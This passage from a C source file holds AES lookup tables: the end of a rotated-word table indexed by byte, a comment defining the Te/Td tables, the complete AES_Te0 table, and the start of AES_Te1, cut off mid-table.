0xB761C935, 0x35B761C9, 0xC935B761, 0x61C935B7, }, /* x=2A */ { 0xB968C43E, 0x3EB968C4, 0xC43EB968, 0x68C43EB9, }, /* x=2B */ { 0x9357E70F, 0x0F9357E7, 0xE70F9357, 0x57E70F93, }, /* x=2C */ { 0x9D5EEA04, 0x049D5EEA, 0xEA049D5E, 0x5EEA049D, }, /* x=2D */ { 0x8F45FD19, 0x198F45FD, 0xFD198F45, 0x45FD198F, }, /* x=2E */ { 0x814CF012, 0x12814CF0, 0xF012814C, 0x4CF01281, }, /* x=2F */ { 0x3BAB6BCB, 0xCB3BAB6B, 0x6BCB3BAB, 0xAB6BCB3B, }, /* x=30 */ { 0x35A266C0, 0xC035A266, 0x66C035A2, 0xA266C035, }, /* x=31 */ { 0x27B971DD, 0xDD27B971, 0x71DD27B9, 0xB971DD27, }, /* x=32 */ { 0x29B07CD6, 0xD629B07C, 0x7CD629B0, 0xB07CD629, }, /* x=33 */ { 0x038F5FE7, 0xE7038F5F, 0x5FE7038F, 0x8F5FE703, }, /* x=34 */ { 0x0D8652EC, 0xEC0D8652, 0x52EC0D86, 0x8652EC0D, }, /* x=35 */ { 0x1F9D45F1, 0xF11F9D45, 0x45F11F9D, 0x9D45F11F, }, /* x=36 */ { 0x119448FA, 0xFA119448, 0x48FA1194, 0x9448FA11, }, /* x=37 */ { 0x4BE30393, 0x934BE303, 0x03934BE3, 0xE303934B, }, /* x=38 */ { 0x45EA0E98, 0x9845EA0E, 0x0E9845EA, 0xEA0E9845, }, /* x=39 */ { 0x57F11985, 0x8557F119, 0x198557F1, 0xF1198557, }, /* x=3A */ { 0x59F8148E, 0x8E59F814, 0x148E59F8, 0xF8148E59, }, /* x=3B */ { 0x73C737BF, 0xBF73C737, 0x37BF73C7, 0xC737BF73, }, /* x=3C */ { 0x7DCE3AB4, 0xB47DCE3A, 0x3AB47DCE, 0xCE3AB47D, }, /* x=3D */ { 0x6FD52DA9, 0xA96FD52D, 0x2DA96FD5, 0xD52DA96F, }, /* x=3E */ { 0x61DC20A2, 0xA261DC20, 0x20A261DC, 0xDC20A261, }, /* x=3F */ { 0xAD766DF6, 0xF6AD766D, 0x6DF6AD76, 0x766DF6AD, }, /* x=40 */ { 0xA37F60FD, 0xFDA37F60, 0x60FDA37F, 0x7F60FDA3, }, /* x=41 */ { 0xB16477E0, 0xE0B16477, 0x77E0B164, 0x6477E0B1, }, /* x=42 */ { 0xBF6D7AEB, 0xEBBF6D7A, 0x7AEBBF6D, 0x6D7AEBBF, }, /* x=43 */ { 0x955259DA, 0xDA955259, 0x59DA9552, 0x5259DA95, }, /* x=44 */ { 0x9B5B54D1, 0xD19B5B54, 0x54D19B5B, 0x5B54D19B, }, /* x=45 */ { 0x894043CC, 0xCC894043, 0x43CC8940, 0x4043CC89, }, /* x=46 */ { 0x87494EC7, 0xC787494E, 0x4EC78749, 0x494EC787, }, /* x=47 */ { 0xDD3E05AE, 0xAEDD3E05, 0x05AEDD3E, 0x3E05AEDD, }, /* x=48 */ { 0xD33708A5, 0xA5D33708, 0x08A5D337, 0x3708A5D3, }, /* x=49 */ { 0xC12C1FB8, 0xB8C12C1F, 0x1FB8C12C, 0x2C1FB8C1, }, /* x=4A */ { 0xCF2512B3, 0xB3CF2512, 0x12B3CF25, 0x2512B3CF, }, /* x=4B */ { 0xE51A3182, 0x82E51A31, 0x3182E51A, 0x1A3182E5, }, /* x=4C */ { 0xEB133C89, 0x89EB133C, 0x3C89EB13, 0x133C89EB, }, /* x=4D */ { 0xF9082B94, 0x94F9082B, 0x2B94F908, 0x082B94F9, }, /* x=4E */ { 0xF701269F, 0x9FF70126, 0x269FF701, 0x01269FF7, }, /* x=4F */ { 0x4DE6BD46, 0x464DE6BD, 0xBD464DE6, 0xE6BD464D, }, /* x=50 */ { 0x43EFB04D, 0x4D43EFB0, 0xB04D43EF, 0xEFB04D43, }, /* x=51 */ { 0x51F4A750, 0x5051F4A7, 0xA75051F4, 0xF4A75051, }, /* x=52 */ { 0x5FFDAA5B, 0x5B5FFDAA, 0xAA5B5FFD, 0xFDAA5B5F, }, /* x=53 */ { 0x75C2896A, 0x6A75C289, 0x896A75C2, 0xC2896A75, }, /* x=54 */ { 0x7BCB8461, 0x617BCB84, 0x84617BCB, 0xCB84617B, }, /* x=55 */ { 0x69D0937C, 0x7C69D093, 0x937C69D0, 0xD0937C69, }, /* x=56 */ { 0x67D99E77, 0x7767D99E, 0x9E7767D9, 0xD99E7767, }, /* x=57 */ { 0x3DAED51E, 0x1E3DAED5, 0xD51E3DAE, 0xAED51E3D, }, /* x=58 */ { 0x33A7D815, 0x1533A7D8, 0xD81533A7, 0xA7D81533, }, /* x=59 */ { 0x21BCCF08, 0x0821BCCF, 0xCF0821BC, 0xBCCF0821, }, /* x=5A */ { 0x2FB5C203, 0x032FB5C2, 0xC2032FB5, 0xB5C2032F, }, /* x=5B */ { 0x058AE132, 0x32058AE1, 0xE132058A, 0x8AE13205, }, /* x=5C */ { 0x0B83EC39, 0x390B83EC, 0xEC390B83, 0x83EC390B, }, /* x=5D */ { 0x1998FB24, 0x241998FB, 0xFB241998, 0x98FB2419, }, /* x=5E */ { 0x1791F62F, 0x2F1791F6, 0xF62F1791, 0x91F62F17, }, /* x=5F */ { 0x764DD68D, 0x8D764DD6, 0xD68D764D, 0x4DD68D76, }, /* x=60 */ { 0x7844DB86, 0x867844DB, 0xDB867844, 0x44DB8678, }, /* x=61 */ { 0x6A5FCC9B, 0x9B6A5FCC, 0xCC9B6A5F, 0x5FCC9B6A, }, /* x=62 */ { 0x6456C190, 0x906456C1, 0xC1906456, 0x56C19064, }, /* x=63 */ { 0x4E69E2A1, 0xA14E69E2, 0xE2A14E69, 0x69E2A14E, }, /* x=64 */ { 0x4060EFAA, 0xAA4060EF, 0xEFAA4060, 0x60EFAA40, }, /* x=65 */ { 0x527BF8B7, 0xB7527BF8, 0xF8B7527B, 0x7BF8B752, }, /* x=66 */ { 0x5C72F5BC, 0xBC5C72F5, 0xF5BC5C72, 0x72F5BC5C, }, /* x=67 */ { 0x0605BED5, 0xD50605BE, 0xBED50605, 0x05BED506, }, /* x=68 */ { 0x080CB3DE, 0xDE080CB3, 0xB3DE080C, 0x0CB3DE08, }, /* x=69 */ { 0x1A17A4C3, 0xC31A17A4, 0xA4C31A17, 0x17A4C31A, }, /* x=6A */ { 0x141EA9C8, 0xC8141EA9, 0xA9C8141E, 0x1EA9C814, }, /* x=6B */ { 0x3E218AF9, 0xF93E218A, 0x8AF93E21, 0x218AF93E, }, /* x=6C */ { 0x302887F2, 0xF2302887, 0x87F23028, 0x2887F230, }, /* x=6D */ { 0x223390EF, 0xEF223390, 0x90EF2233, 0x3390EF22, }, /* x=6E */ { 0x2C3A9DE4, 0xE42C3A9D, 0x9DE42C3A, 0x3A9DE42C, }, /* x=6F */ { 0x96DD063D, 0x3D96DD06, 0x063D96DD, 0xDD063D96, }, /* x=70 */ { 0x98D40B36, 0x3698D40B, 0x0B3698D4, 0xD40B3698, }, /* x=71 */ { 0x8ACF1C2B, 0x2B8ACF1C, 0x1C2B8ACF, 0xCF1C2B8A, }, /* x=72 */ { 0x84C61120, 0x2084C611, 0x112084C6, 0xC6112084, }, /* x=73 */ { 0xAEF93211, 0x11AEF932, 0x3211AEF9, 0xF93211AE, }, /* x=74 */ { 0xA0F03F1A, 0x1AA0F03F, 0x3F1AA0F0, 0xF03F1AA0, }, /* x=75 */ { 0xB2EB2807, 0x07B2EB28, 0x2807B2EB, 0xEB2807B2, }, /* x=76 */ { 0xBCE2250C, 0x0CBCE225, 0x250CBCE2, 0xE2250CBC, }, /* x=77 */ { 0xE6956E65, 0x65E6956E, 0x6E65E695, 0x956E65E6, }, /* x=78 */ { 0xE89C636E, 0x6EE89C63, 0x636EE89C, 0x9C636EE8, }, /* x=79 */ { 0xFA877473, 0x73FA8774, 0x7473FA87, 0x877473FA, }, /* x=7A */ { 0xF48E7978, 0x78F48E79, 0x7978F48E, 0x8E7978F4, }, /* x=7B */ { 0xDEB15A49, 0x49DEB15A, 0x5A49DEB1, 0xB15A49DE, }, /* x=7C */ { 0xD0B85742, 0x42D0B857, 0x5742D0B8, 0xB85742D0, }, /* x=7D */ { 0xC2A3405F, 0x5FC2A340, 0x405FC2A3, 0xA3405FC2, }, /* x=7E */ { 0xCCAA4D54, 0x54CCAA4D, 0x4D54CCAA, 0xAA4D54CC, }, /* x=7F */ { 0x41ECDAF7, 0xF741ECDA, 0xDAF741EC, 0xECDAF741, }, /* x=80 */ { 0x4FE5D7FC, 0xFC4FE5D7, 0xD7FC4FE5, 0xE5D7FC4F, }, /* x=81 */ { 0x5DFEC0E1, 0xE15DFEC0, 0xC0E15DFE, 0xFEC0E15D, }, /* x=82 */ { 0x53F7CDEA, 0xEA53F7CD, 0xCDEA53F7, 0xF7CDEA53, }, /* x=83 */ { 0x79C8EEDB, 0xDB79C8EE, 0xEEDB79C8, 0xC8EEDB79, }, /* x=84 */ { 0x77C1E3D0, 0xD077C1E3, 0xE3D077C1, 0xC1E3D077, }, /* x=85 */ { 0x65DAF4CD, 0xCD65DAF4, 0xF4CD65DA, 0xDAF4CD65, }, /* x=86 */ { 0x6BD3F9C6, 0xC66BD3F9, 0xF9C66BD3, 0xD3F9C66B, }, /* x=87 */ { 0x31A4B2AF, 0xAF31A4B2, 0xB2AF31A4, 0xA4B2AF31, }, /* x=88 */ { 0x3FADBFA4, 0xA43FADBF, 0xBFA43FAD, 0xADBFA43F, }, /* x=89 */ { 0x2DB6A8B9, 0xB92DB6A8, 0xA8B92DB6, 0xB6A8B92D, }, /* x=8A */ { 0x23BFA5B2, 0xB223BFA5, 0xA5B223BF, 0xBFA5B223, }, /* x=8B */ { 0x09808683, 0x83098086, 0x86830980, 0x80868309, }, /* x=8C */ { 0x07898B88, 0x8807898B, 0x8B880789, 0x898B8807, }, /* x=8D */ { 0x15929C95, 0x9515929C, 0x9C951592, 0x929C9515, }, /* x=8E */ { 0x1B9B919E, 0x9E1B9B91, 0x919E1B9B, 0x9B919E1B, }, /* x=8F */ { 0xA17C0A47, 0x47A17C0A, 0x0A47A17C, 0x7C0A47A1, }, /* x=90 */ { 0xAF75074C, 0x4CAF7507, 0x074CAF75, 0x75074CAF, }, /* x=91 */ { 0xBD6E1051, 0x51BD6E10, 0x1051BD6E, 0x6E1051BD, }, /* x=92 */ { 0xB3671D5A, 0x5AB3671D, 0x1D5AB367, 0x671D5AB3, }, /* x=93 */ { 0x99583E6B, 0x6B99583E, 0x3E6B9958, 0x583E6B99, }, /* x=94 */ { 0x97513360, 0x60975133, 0x33609751, 0x51336097, }, /* x=95 */ { 0x854A247D, 0x7D854A24, 0x247D854A, 0x4A247D85, }, /* x=96 */ { 0x8B432976, 0x768B4329, 0x29768B43, 0x4329768B, }, /* x=97 */ { 0xD134621F, 0x1FD13462, 0x621FD134, 0x34621FD1, }, /* x=98 */ { 0xDF3D6F14, 0x14DF3D6F, 0x6F14DF3D, 0x3D6F14DF, }, /* x=99 */ { 0xCD267809, 0x09CD2678, 0x7809CD26, 0x267809CD, }, /* x=9A */ { 0xC32F7502, 0x02C32F75, 0x7502C32F, 0x2F7502C3, }, /* x=9B */ { 0xE9105633, 0x33E91056, 0x5633E910, 0x105633E9, }, /* x=9C */ { 0xE7195B38, 0x38E7195B, 0x5B38E719, 0x195B38E7, }, /* x=9D */ { 0xF5024C25, 0x25F5024C, 0x4C25F502, 0x024C25F5, }, /* x=9E */ { 0xFB0B412E, 0x2EFB0B41, 0x412EFB0B, 0x0B412EFB, }, /* x=9F */ { 0x9AD7618C, 0x8C9AD761, 0x618C9AD7, 0xD7618C9A, }, /* x=A0 */ { 0x94DE6C87, 0x8794DE6C, 0x6C8794DE, 0xDE6C8794, }, /* x=A1 */ { 0x86C57B9A, 0x9A86C57B, 0x7B9A86C5, 0xC57B9A86, }, /* x=A2 */ { 0x88CC7691, 0x9188CC76, 0x769188CC, 0xCC769188, }, /* x=A3 */ { 0xA2F355A0, 0xA0A2F355, 0x55A0A2F3, 0xF355A0A2, }, /* x=A4 */ { 0xACFA58AB, 0xABACFA58, 0x58ABACFA, 0xFA58ABAC, }, /* x=A5 */ { 0xBEE14FB6, 0xB6BEE14F, 0x4FB6BEE1, 0xE14FB6BE, }, /* x=A6 */ { 0xB0E842BD, 0xBDB0E842, 0x42BDB0E8, 0xE842BDB0, }, /* x=A7 */ { 0xEA9F09D4, 0xD4EA9F09, 0x09D4EA9F, 0x9F09D4EA, }, /* x=A8 */ { 0xE49604DF, 0xDFE49604, 0x04DFE496, 0x9604DFE4, }, /* x=A9 */ { 0xF68D13C2, 0xC2F68D13, 0x13C2F68D, 0x8D13C2F6, }, /* x=AA */ { 0xF8841EC9, 0xC9F8841E, 0x1EC9F884, 0x841EC9F8, }, /* x=AB */ { 0xD2BB3DF8, 0xF8D2BB3D, 0x3DF8D2BB, 0xBB3DF8D2, }, /* x=AC */ { 0xDCB230F3, 0xF3DCB230, 0x30F3DCB2, 0xB230F3DC, }, /* x=AD */ { 0xCEA927EE, 0xEECEA927, 0x27EECEA9, 0xA927EECE, }, /* x=AE */ { 0xC0A02AE5, 0xE5C0A02A, 0x2AE5C0A0, 0xA02AE5C0, }, /* x=AF */ { 0x7A47B13C, 0x3C7A47B1, 0xB13C7A47, 0x47B13C7A, }, /* x=B0 */ { 0x744EBC37, 0x37744EBC, 0xBC37744E, 0x4EBC3774, }, /* x=B1 */ { 0x6655AB2A, 0x2A6655AB, 0xAB2A6655, 0x55AB2A66, }, /* x=B2 */ { 0x685CA621, 0x21685CA6, 0xA621685C, 0x5CA62168, }, /* x=B3 */ { 0x42638510, 0x10426385, 0x85104263, 0x63851042, }, /* x=B4 */ { 0x4C6A881B, 0x1B4C6A88, 0x881B4C6A, 0x6A881B4C, }, /* x=B5 */ { 0x5E719F06, 0x065E719F, 0x9F065E71, 0x719F065E, }, /* x=B6 */ { 0x5078920D, 0x0D507892, 0x920D5078, 0x78920D50, }, /* x=B7 */ { 0x0A0FD964, 0x640A0FD9, 0xD9640A0F, 0x0FD9640A, }, /* x=B8 */ { 0x0406D46F, 0x6F0406D4, 0xD46F0406, 0x06D46F04, }, /* x=B9 */ { 0x161DC372, 0x72161DC3, 0xC372161D, 0x1DC37216, }, /* x=BA */ { 0x1814CE79, 0x791814CE, 0xCE791814, 0x14CE7918, }, /* x=BB */ { 0x322BED48, 0x48322BED, 0xED48322B, 0x2BED4832, }, /* x=BC */ { 0x3C22E043, 0x433C22E0, 0xE0433C22, 0x22E0433C, }, /* x=BD */ { 0x2E39F75E, 0x5E2E39F7, 0xF75E2E39, 0x39F75E2E, }, /* x=BE */ { 0x2030FA55, 0x552030FA, 0xFA552030, 0x30FA5520, }, /* x=BF */ { 0xEC9AB701, 0x01EC9AB7, 0xB701EC9A, 0x9AB701EC, }, /* x=C0 */ { 0xE293BA0A, 0x0AE293BA, 0xBA0AE293, 0x93BA0AE2, }, /* x=C1 */ { 0xF088AD17, 0x17F088AD, 0xAD17F088, 0x88AD17F0, }, /* x=C2 */ { 0xFE81A01C, 0x1CFE81A0, 0xA01CFE81, 0x81A01CFE, }, /* x=C3 */ { 0xD4BE832D, 0x2DD4BE83, 0x832DD4BE, 0xBE832DD4, }, /* x=C4 */ { 0xDAB78E26, 0x26DAB78E, 0x8E26DAB7, 0xB78E26DA, }, /* x=C5 */ { 0xC8AC993B, 0x3BC8AC99, 0x993BC8AC, 0xAC993BC8, }, /* x=C6 */ { 0xC6A59430, 0x30C6A594, 0x9430C6A5, 0xA59430C6, }, /* x=C7 */ { 0x9CD2DF59, 0x599CD2DF, 0xDF599CD2, 0xD2DF599C, }, /* x=C8 */ { 0x92DBD252, 0x5292DBD2, 0xD25292DB, 0xDBD25292, }, /* x=C9 */ { 0x80C0C54F, 0x4F80C0C5, 0xC54F80C0, 0xC0C54F80, }, /* x=CA */ { 0x8EC9C844, 0x448EC9C8, 0xC8448EC9, 0xC9C8448E, }, /* x=CB */ { 0xA4F6EB75, 0x75A4F6EB, 0xEB75A4F6, 0xF6EB75A4, }, /* x=CC */ { 0xAAFFE67E, 0x7EAAFFE6, 0xE67EAAFF, 0xFFE67EAA, }, /* x=CD */ { 0xB8E4F163, 0x63B8E4F1, 0xF163B8E4, 0xE4F163B8, }, /* x=CE */ { 0xB6EDFC68, 0x68B6EDFC, 0xFC68B6ED, 0xEDFC68B6, }, /* x=CF */ { 0x0C0A67B1, 0xB10C0A67, 0x67B10C0A, 0x0A67B10C, }, /* x=D0 */ { 0x02036ABA, 0xBA02036A, 0x6ABA0203, 0x036ABA02, }, /* x=D1 */ { 0x10187DA7, 0xA710187D, 0x7DA71018, 0x187DA710, }, /* x=D2 */ { 0x1E1170AC, 0xAC1E1170, 0x70AC1E11, 0x1170AC1E, }, /* x=D3 */ { 0x342E539D, 0x9D342E53, 0x539D342E, 0x2E539D34, }, /* x=D4 */ { 0x3A275E96, 0x963A275E, 0x5E963A27, 0x275E963A, }, /* x=D5 */ { 0x283C498B, 0x8B283C49, 0x498B283C, 0x3C498B28, }, /* x=D6 */ { 0x26354480, 0x80263544, 0x44802635, 0x35448026, }, /* x=D7 */ { 0x7C420FE9, 0xE97C420F, 0x0FE97C42, 0x420FE97C, }, /* x=D8 */ { 0x724B02E2, 0xE2724B02, 0x02E2724B, 0x4B02E272, }, /* x=D9 */ { 0x605015FF, 0xFF605015, 0x15FF6050, 0x5015FF60, }, /* x=DA */ { 0x6E5918F4, 0xF46E5918, 0x18F46E59, 0x5918F46E, }, /* x=DB */ { 0x44663BC5, 0xC544663B, 0x3BC54466, 0x663BC544, }, /* x=DC */ { 0x4A6F36CE, 0xCE4A6F36, 0x36CE4A6F, 0x6F36CE4A, }, /* x=DD */ { 0x587421D3, 0xD3587421, 0x21D35874, 0x7421D358, }, /* x=DE */ { 0x567D2CD8, 0xD8567D2C, 0x2CD8567D, 0x7D2CD856, }, /* x=DF */ { 0x37A10C7A, 0x7A37A10C, 0x0C7A37A1, 0xA10C7A37, }, /* x=E0 */ { 0x39A80171, 0x7139A801, 0x017139A8, 0xA8017139, }, /* x=E1 */ { 0x2BB3166C, 0x6C2BB316, 0x166C2BB3, 0xB3166C2B, }, /* x=E2 */ { 0x25BA1B67, 0x6725BA1B, 0x1B6725BA, 0xBA1B6725, }, /* x=E3 */ { 0x0F853856, 0x560F8538, 0x38560F85, 0x8538560F, }, /* x=E4 */ { 0x018C355D, 0x5D018C35, 0x355D018C, 0x8C355D01, }, /* x=E5 */ { 0x13972240, 0x40139722, 0x22401397, 0x97224013, }, /* x=E6 */ { 0x1D9E2F4B, 0x4B1D9E2F, 0x2F4B1D9E, 0x9E2F4B1D, }, /* x=E7 */ { 0x47E96422, 0x2247E964, 0x642247E9, 0xE9642247, }, /* x=E8 */ { 0x49E06929, 0x2949E069, 0x692949E0, 0xE0692949, }, /* x=E9 */ { 0x5BFB7E34, 0x345BFB7E, 0x7E345BFB, 0xFB7E345B, }, /* x=EA */ { 0x55F2733F, 0x3F55F273, 0x733F55F2, 0xF2733F55, }, /* x=EB */ { 0x7FCD500E, 0x0E7FCD50, 0x500E7FCD, 0xCD500E7F, }, /* x=EC */ { 0x71C45D05, 0x0571C45D, 0x5D0571C4, 0xC45D0571, }, /* x=ED */ { 0x63DF4A18, 0x1863DF4A, 0x4A1863DF, 0xDF4A1863, }, /* x=EE */ { 0x6DD64713, 0x136DD647, 0x47136DD6, 0xD647136D, }, /* x=EF */ { 0xD731DCCA, 0xCAD731DC, 0xDCCAD731, 0x31DCCAD7, }, /* x=F0 */ { 0xD938D1C1, 0xC1D938D1, 0xD1C1D938, 0x38D1C1D9, }, /* x=F1 */ { 0xCB23C6DC, 0xDCCB23C6, 0xC6DCCB23, 0x23C6DCCB, }, /* x=F2 */ { 0xC52ACBD7, 0xD7C52ACB, 0xCBD7C52A, 0x2ACBD7C5, }, /* x=F3 */ { 0xEF15E8E6, 0xE6EF15E8, 0xE8E6EF15, 0x15E8E6EF, }, /* x=F4 */ { 0xE11CE5ED, 0xEDE11CE5, 0xE5EDE11C, 0x1CE5EDE1, }, /* x=F5 */ { 0xF307F2F0, 0xF0F307F2, 0xF2F0F307, 0x07F2F0F3, }, /* x=F6 */ { 0xFD0EFFFB, 0xFBFD0EFF, 0xFFFBFD0E, 0x0EFFFBFD, }, /* x=F7 */ { 0xA779B492, 0x92A779B4, 0xB492A779, 0x79B492A7, }, /* x=F8 */ { 0xA970B999, 0x99A970B9, 0xB999A970, 0x70B999A9, }, /* x=F9 */ { 0xBB6BAE84, 0x84BB6BAE, 0xAE84BB6B, 0x6BAE84BB, }, /* x=FA */ { 0xB562A38F, 0x8FB562A3, 0xA38FB562, 0x62A38FB5, }, /* x=FB */ { 0x9F5D80BE, 0xBE9F5D80, 0x80BE9F5D, 0x5D80BE9F, }, /* x=FC */ { 0x91548DB5, 0xB591548D, 0x8DB59154, 0x548DB591, }, /* x=FD */ { 0x834F9AA8, 0xA8834F9A, 0x9AA8834F, 0x4F9AA883, }, /* x=FE */ { 0x8D4697A3, 0xA38D4697, 0x97A38D46, 0x4697A38D, }, /* x=FF */ }; /* AES_Te0[x] = S [x].[02, 01, 01, 03]; AES_Te1[x] = S [x].[03, 02, 01, 01]; AES_Te2[x] = S [x].[01, 03, 02, 01]; AES_Te3[x] = S [x].[01, 01, 03, 02]; AES_Te4[x] = S [x].[01, 01, 01, 01]; AES_Td0[x] = Si[x].[0e, 09, 0d, 0b]; AES_Td1[x] = Si[x].[0b, 0e, 09, 0d]; AES_Td2[x] = Si[x].[0d, 0b, 0e, 09]; AES_Td3[x] = Si[x].[09, 0d, 0b, 0e]; AES_Td4[x] = Si[x].[01, 01, 01, 01]; */ const uint32_t AES_Te0[256] = { 0xc66363a5U, 0xf87c7c84U, 0xee777799U, 0xf67b7b8dU, 0xfff2f20dU, 0xd66b6bbdU, 0xde6f6fb1U, 0x91c5c554U, 0x60303050U, 0x02010103U, 0xce6767a9U, 0x562b2b7dU, 0xe7fefe19U, 0xb5d7d762U, 0x4dababe6U, 0xec76769aU, 0x8fcaca45U, 0x1f82829dU, 0x89c9c940U, 0xfa7d7d87U, 0xeffafa15U, 0xb25959ebU, 0x8e4747c9U, 0xfbf0f00bU, 0x41adadecU, 0xb3d4d467U, 0x5fa2a2fdU, 0x45afafeaU, 0x239c9cbfU, 0x53a4a4f7U, 0xe4727296U, 0x9bc0c05bU, 0x75b7b7c2U, 0xe1fdfd1cU, 0x3d9393aeU, 0x4c26266aU, 0x6c36365aU, 0x7e3f3f41U, 0xf5f7f702U, 0x83cccc4fU, 0x6834345cU, 0x51a5a5f4U, 0xd1e5e534U, 0xf9f1f108U, 0xe2717193U, 0xabd8d873U, 0x62313153U, 0x2a15153fU, 0x0804040cU, 0x95c7c752U, 0x46232365U, 0x9dc3c35eU, 0x30181828U, 0x379696a1U, 0x0a05050fU, 0x2f9a9ab5U, 0x0e070709U, 0x24121236U, 0x1b80809bU, 0xdfe2e23dU, 0xcdebeb26U, 0x4e272769U, 0x7fb2b2cdU, 0xea75759fU, 0x1209091bU, 0x1d83839eU, 0x582c2c74U, 0x341a1a2eU, 0x361b1b2dU, 0xdc6e6eb2U, 0xb45a5aeeU, 0x5ba0a0fbU, 0xa45252f6U, 0x763b3b4dU, 0xb7d6d661U, 0x7db3b3ceU, 0x5229297bU, 0xdde3e33eU, 0x5e2f2f71U, 0x13848497U, 0xa65353f5U, 0xb9d1d168U, 0x00000000U, 0xc1eded2cU, 0x40202060U, 0xe3fcfc1fU, 0x79b1b1c8U, 0xb65b5bedU, 0xd46a6abeU, 0x8dcbcb46U, 0x67bebed9U, 0x7239394bU, 0x944a4adeU, 0x984c4cd4U, 0xb05858e8U, 0x85cfcf4aU, 0xbbd0d06bU, 0xc5efef2aU, 0x4faaaae5U, 0xedfbfb16U, 0x864343c5U, 0x9a4d4dd7U, 0x66333355U, 0x11858594U, 0x8a4545cfU, 0xe9f9f910U, 0x04020206U, 0xfe7f7f81U, 0xa05050f0U, 0x783c3c44U, 0x259f9fbaU, 0x4ba8a8e3U, 0xa25151f3U, 0x5da3a3feU, 0x804040c0U, 0x058f8f8aU, 0x3f9292adU, 0x219d9dbcU, 0x70383848U, 0xf1f5f504U, 0x63bcbcdfU, 0x77b6b6c1U, 0xafdada75U, 0x42212163U, 0x20101030U, 0xe5ffff1aU, 0xfdf3f30eU, 0xbfd2d26dU, 0x81cdcd4cU, 0x180c0c14U, 0x26131335U, 0xc3ecec2fU, 0xbe5f5fe1U, 0x359797a2U, 0x884444ccU, 0x2e171739U, 0x93c4c457U, 0x55a7a7f2U, 0xfc7e7e82U, 0x7a3d3d47U, 0xc86464acU, 0xba5d5de7U, 0x3219192bU, 0xe6737395U, 0xc06060a0U, 0x19818198U, 0x9e4f4fd1U, 0xa3dcdc7fU, 0x44222266U, 0x542a2a7eU, 0x3b9090abU, 0x0b888883U, 0x8c4646caU, 0xc7eeee29U, 0x6bb8b8d3U, 0x2814143cU, 0xa7dede79U, 0xbc5e5ee2U, 0x160b0b1dU, 0xaddbdb76U, 0xdbe0e03bU, 0x64323256U, 0x743a3a4eU, 0x140a0a1eU, 0x924949dbU, 0x0c06060aU, 0x4824246cU, 0xb85c5ce4U, 0x9fc2c25dU, 0xbdd3d36eU, 0x43acacefU, 0xc46262a6U, 0x399191a8U, 0x319595a4U, 0xd3e4e437U, 0xf279798bU, 0xd5e7e732U, 0x8bc8c843U, 0x6e373759U, 0xda6d6db7U, 0x018d8d8cU, 0xb1d5d564U, 0x9c4e4ed2U, 0x49a9a9e0U, 0xd86c6cb4U, 0xac5656faU, 0xf3f4f407U, 0xcfeaea25U, 0xca6565afU, 0xf47a7a8eU, 0x47aeaee9U, 0x10080818U, 0x6fbabad5U, 0xf0787888U, 0x4a25256fU, 0x5c2e2e72U, 0x381c1c24U, 0x57a6a6f1U, 0x73b4b4c7U, 0x97c6c651U, 0xcbe8e823U, 0xa1dddd7cU, 0xe874749cU, 0x3e1f1f21U, 0x964b4bddU, 0x61bdbddcU, 0x0d8b8b86U, 0x0f8a8a85U, 0xe0707090U, 0x7c3e3e42U, 0x71b5b5c4U, 0xcc6666aaU, 0x904848d8U, 0x06030305U, 0xf7f6f601U, 0x1c0e0e12U, 0xc26161a3U, 0x6a35355fU, 0xae5757f9U, 0x69b9b9d0U, 0x17868691U, 0x99c1c158U, 0x3a1d1d27U, 0x279e9eb9U, 0xd9e1e138U, 0xebf8f813U, 0x2b9898b3U, 0x22111133U, 0xd26969bbU, 0xa9d9d970U, 0x078e8e89U, 0x339494a7U, 0x2d9b9bb6U, 0x3c1e1e22U, 0x15878792U, 0xc9e9e920U, 0x87cece49U, 0xaa5555ffU, 0x50282878U, 0xa5dfdf7aU, 0x038c8c8fU, 0x59a1a1f8U, 0x09898980U, 0x1a0d0d17U, 0x65bfbfdaU, 0xd7e6e631U, 0x844242c6U, 0xd06868b8U, 0x824141c3U, 0x299999b0U, 0x5a2d2d77U, 0x1e0f0f11U, 0x7bb0b0cbU, 0xa85454fcU, 0x6dbbbbd6U, 0x2c16163aU, }; const uint32_t AES_Te1[256] = { 0xa5c66363U, 0x84f87c7cU, 0x99ee7777U, 0x8df67b7bU, 0x0dfff2f2U, 0xbdd66b6bU, 0xb1de6f6fU, 0x5491c5c5U, 0x50603030U, 0x03020101U, 0xa9ce6767U, 0x7d562b2bU, 0x19e7fefeU, 0x62b5d7d7U, 0xe64dababU, 0x9aec7676U, 0x458fcacaU, 0x9d1f8282U, 0x4089c9c9U, 0x87fa7d7dU, 0x15effafaU, 0xebb25959U, 0xc98e4747U, 0x0bfbf0f0U, 0xec41adadU, 0x67b3d4d4U, 0xfd5fa2a2U, 0xea45afafU, 0xbf239c9cU, 0xf753a4a4U, 0x96e47272U, 0x5b9bc0c0U, 0xc275b7b7U, 0x1ce1fdfdU, 0xae3d9393U, 0x6a4c2626U, 0x5a6c3636U, 0x417e3f3fU, 0x02f5f7f7U, 0x4f83ccccU, 0x5c683434U, 0xf451a5a5U, 0x34d1e5e5U, 0x08f9f1f1U, 0x93e27171U, 0x73abd8d8U, 0x53623131U, 0x3f2a1515U, 0x0c080404U, 0x5295c7c7U, 0x65462323U, 0x5e9dc3c3U, 0x28301818U, 0xa1379696U, 0x0f0a0505U, 0xb52f9a9aU, 0x090e0707U, 0x36241212U, 0x9b1b8080U, 0x3ddfe2e2U, 0x26cdebebU, 0x694e2727U, 0xcd7fb2b2U, 0x9fea7575U, 0x1b120909U, 0x9e1d8383U, 0x74582c2cU, 0x2e341a1aU, 0x2d361b1bU, 0xb2dc6e6eU, 0xeeb45a5aU, 0xfb5ba0a0U, 0xf6a45252U, 0x4d763b3bU, 0x61b7d6d6U, 0xce7db3b3U, 0x7b522929U, 0x3edde3e3U, 0x715e2f2fU, 0x97138484U, 0xf5a65353U, 0x68b9d1d1U, 0x00000000U, 0x2cc1ededU, 0x60402020U, 0x1fe3fcfcU, 0xc879b1b1U, 0xedb65b5bU, 0xbed46a6aU, 0x468dcbcbU, 0xd967bebeU, 0x4b723939U, 0xde944a4aU, 0xd4984c4cU, 0xe8b05858U, 0x4a85cfcfU, 0x6bbbd0d0U, 0x2ac5efefU, 0xe54faaaaU, 0x16edfbfbU, 0xc5864343U, 0xd79a4d4dU, 0x55663333U, 0x94118585U, 0xcf8a4545U, 0x10e9f9f9U, 0x06040202U, 0x81fe7f7fU, 0xf0a05050U, 0x44783c3cU, 0xba259f9fU, 0xe34ba8a8U, 0xf3a25151U, 0xfe5da3a3U, 0xc0804040U, 0x8a058f8fU, 0xad3f9292U, 0xbc219d9dU, 0x48703838U, 0x04f1f5f5U, 0xdf63bcbcU, 0xc177b6b6U, 0x75afdadaU, 